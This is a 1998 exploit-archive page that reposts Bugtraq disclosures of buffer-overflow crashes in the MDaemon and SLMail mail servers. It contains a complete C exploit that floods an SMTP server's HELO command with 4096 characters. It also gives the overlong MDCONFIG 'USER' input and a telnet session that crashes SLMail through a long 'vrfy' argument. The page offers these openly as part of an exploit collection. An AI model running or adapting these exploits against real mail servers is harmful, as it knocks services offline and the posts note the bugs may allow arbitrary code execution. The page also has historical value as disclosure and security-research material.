MDaemon/SLMail Mail server overflows

Summary
Description:Most Windows servers in generally seem to have horrific security. Here is info on overflows in the MDaemon SMTP/Pop Server and the Seattle labs server. Many Macintosh servers also have these problems, and even UNIX isn't always immune to poor coding.
Author:Alvaro Martinez Echevarria <alvaro-bugtraq@LANDER.ES>
Compromise:Crash the server, perhaps arbitrary code could be executed.
Vulnerable Systems:Windows boxes running a vulnerable version of MDaemon, Seattle Labs SLMail, and several other crappy Windows servers.
Date:11 March 1998
Details


Date: Wed, 11 Mar 1998 05:33:53 +0100
From: Alvaro Martinez Echevarria <alvaro-bugtraq@LANDER.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: DoS (and possibly more) on MDaemon for NT/95

    [The following text is in the "iso-8859-1" character set]
    [Your display is set for the "US-ASCII" character set]
    [Some characters may be displayed incorrectly]

Hi there.

Around a month ago I sent the following message to
sales@mdaemon.com.  In a few words: there's a security problem in
the SMTP/POP/WebPop software they provide for evaluation (and
probably also in the commercial version they sell, see
www.mdaemon.com), that lets you kill SMTP and POP services
provided that you can connect to a sort of configuration port the
programs use (in the configuration I tested the port was N+1, for
N being the port used by WebPop). My knowledge on Windoze
asymptotically approaches zero, so I cannot give much more
details. I haven't received any interesting message from
@mdaemon.com, apart from "we'll forward this information to our
developers" (?); and I've seen nothing related to this security
problem in their web so far, so the time has come to post to
bugtraq, I guess. Possible workaround: block that port using a
firewall. Just in case anyone out there is crazy enough to use
this thing ;-).

Regards.

.------------------------------------------------------------------.
|   Alvaro Martínez Echevarría   |      LANDER SISTEMAS            |
|        alvaro@lander.es        |      Pº Castellana, 121         |
`--------------------------------|      28046 Madrid, SPAIN        |
                                 |      Tel: +34-1-5562883         |
                                 |      Fax: +34-1-5563001         |
                                 `---------------------------------'
---------- Forwarded message ----------
From: Alvaro Martinez Echevarria <alvaro@lander.es>
To: sales@mdaemon.com
Date: Sun, 15 Feb 1998 19:59:03 +0100 (CET)
Subject: DoS attack on MDaemon

Hi there.
I have found a really easy to use DoS attack on your MDaemon
server, which some people here in my company have been evaluating.
They asked me to take a look at the security of the product, and
the very first thing I tried just brought the SMTP/POP services down.
It was easy: I connected to a port whose greeting says "+OK
xxx.xxx MDCONFIG Interface Ready", and after some trial and
error this is what I found:

VERS 3.0
+OK MDConfig v3.0 acceptable.
USER aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]

The "a" here needs to be repeated a lot of times, say 2000. And
after that, voilà: "Connection closed by foreign host" and let die
the SMTP and POP services. As you should know, this same bug
could be used in a more clever way to execute arbitrary code in
any server that is using your MDaemon software. I think you
should correct this problem right away, and pay more attention
to bounds checking in your future development.
Regards.
Date: Wed, 11 Mar 1998 00:44:45 -0600
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: MDaemon SMTP Server Buffer Overflow's

[ forwarded from rootshell ]

Since a similar bug was just released about the MDaemon Config Manager on
Bugtraq, we decided to release our MDaemon exploit early.  After the exploit
you will find the original Bugtraq post.  Note that MDaemon has known about
this bug since February.  Look for our upcoming paper on SMTP server
security.

/*
 * MDaemon SMTP server for Windows buffer overflow exploit
 *
 * http://www.mdaemon.com - if you dare...
 *
 * Tested on MDaemon 2.71 SP1
 *
 * http://www.rootshell.com/
 *
 * Released 3/10/98
 *
 * (C) 1998 Rootshell All Rights Reserved
 *
 * For educational use only.  Distribute freely.
 *
 * Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail
 *       connector if SP2 has NOT been installed.
 *
 * Danger!
 *
 * A malicous user could use this bug to execute arbitrary code on the
 * remote system.
 *
 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

void main(int argc, char *argv[])
{
  struct sockaddr_in sin;
  struct hostent *hp;
  char *buffer;
  int sock, i;

  if (argc != 2) {
    printf("usage: %s <smtp server>\n", argv[0]);
    exit(1);
  }
  hp = gethostbyname(argv[1]);
  if (hp==NULL) {
    printf("Unknown host: %s\n",argv[1]);
    exit(1);
  }
  bzero((char*) &sin, sizeof(sin));
  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  sin.sin_family = hp->h_addrtype;
  sin.sin_port = htons(25);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  connect(sock,(struct sockaddr *) &sin, sizeof(sin));
  buffer = (char *)malloc(10000);
  sprintf(buffer, "HELO ");
  for (i = 0; i<4096; i++)
    strcat(buffer, "x");
  strcat(buffer, "\r\n");
  write(sock, &buffer[0], strlen(buffer));
  close(sock);
  free(buffer);
}

-- cut here --

Rootshell Note: The config manager appears to run on port 8081 and is
configurable.  In the version that we tested (2.71 SP1) this buffer overflow
did not exist in the remote config manager, and required a remote version of
3.7 and not 3.0.
Date: Wed, 11 Mar 1998 20:44:56 -0500
From: Steven <steven@EFNI.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: SLMail 2.6 DoS

Hello,

        I have recently found a quite serious DoS attack for the SLMail
2.6 email daemon (www.seattlelabs.com/slmail). A long string of text
after a command makes the program crash.  I have only tested this on
2.6, so I'm not sure if other versions are vulnerable.

craphole:~$ telnet www.victim.com 25
Trying 555.55.555.55...
Connected to www.victim.com.
Escape character is '^]'.
220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here
vrfy
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
Connection closed by foreign host.

craphole:~$ telnet www.victim.com 25
Trying 555.55.555.55...
telnet: Unable to connect to remote host: Connection refused
craphole:~$

        It will stay unresponsive until manually restarted. I haven't
mailed Seattle Labs about this, but I'm sure they'll figure it out.

Later,

Cisc0 @ Undernet
steven@efni.com
More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: